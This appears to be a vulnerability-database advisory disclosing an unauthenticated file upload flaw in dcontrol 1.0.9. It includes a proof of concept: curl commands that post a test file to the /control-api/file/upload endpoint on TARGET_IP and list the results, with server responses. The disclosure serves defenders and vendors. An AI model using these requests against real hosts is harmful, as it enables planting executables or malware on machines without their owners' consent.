📄 dcontrol 1.0.9 Arbitrary File Upload

🗓️ 20 Apr 2026 00:00:00Reported by Chokri HammediType

dcontrol version 1.0.9 allows unauthenticated arbitrary file uploads to a fixed directory.

# Exploit Title: dcontrol v1.0.9 - Unauthenticated Arbitrary File Upload
    # Date: 2026-04-18
    # Exploit Author: Chokri Hammedi
    # Vendor Homepage: https://github.com/dhjz/dcontrol
    # Software Link:
    https://github.com/dhjz/dcontrol/releases/download/1.0.9/dcontrol.exe
    # Version: 1.0.9
    # Tested on: Windows 10, Windows 11
    
    
    # Description:
    dcontrol v1.0.9 is vulnerable to unauthenticated arbitrary file upload via
    the
    /control-api/file/upload endpoint. The application does not require any
    authentication and accepts file uploads from any source. While the upload
    directory is fixed to a configured location (default: ./files), an attacker
    can
    upload arbitrary file types including executables, scripts, and malware.
    
    # Proof of Concept 1: Basic File Upload
    
    Create a test file and upload it:
    echo "UNAUTHENTICATED UPLOAD TEST" > upload_test.txt
    
    curl -X POST -F "file=@upload_test.txt" "
    http://TARGET_IP:666/control-api/file/upload"
    
    Response:
    {"code":200,"msg":"操作成功","data":"upload_test.txt"}
    
    
    
    File is located in c:\Users\<USER Name>\Downloads\files
    
    
    Verify uploads using the list endpoint:
    curl "http://TARGET_IP:666/control-api/file/list" | jq
    
    {
      "code": 200,
      "msg": "操作成功",
      "data": [
        {
          "name": "upload_test.txt",
          "size": 28,
          "sizes": "28 B",
          "time": "2026-04-17 21:43:43",
          "timestamp": 1776487423317
        }
      ]
    }

20 Apr 2026 00:00Current

5.9Medium risk

Vulners AI Score5.9